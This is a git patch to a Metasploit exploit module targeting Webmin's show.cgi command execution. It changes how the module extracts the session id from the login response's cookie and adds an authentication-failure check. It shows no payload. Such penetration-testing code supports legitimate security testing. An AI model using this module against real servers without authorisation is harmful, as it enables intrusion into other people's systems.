From cbc778cb474788d5eeb9992ed7b715d0b525a351 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sat, 15 Sep 2012 23:53:09 +0200
Subject: [PATCH] add changes proposed by sinn3r

---
 modules/exploits/unix/webapp/webmin_show_cgi_exec.rb | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb
index a1f5898861..1ce7165949 100644
--- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb
+++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb
@@ -121,8 +121,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			}, 25)
 
 		if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
+			session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
+			if session and not session.empty?
+				print_good "#{peer} - Authentication successfully"
+			else
+				print_error "#{peer} - Authentication failed"
+				return
+			end
 			print_good "#{peer} - Authentication successfully"
-			session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0]
 		else
 			print_error "#{peer} - Authentication failed"
 			return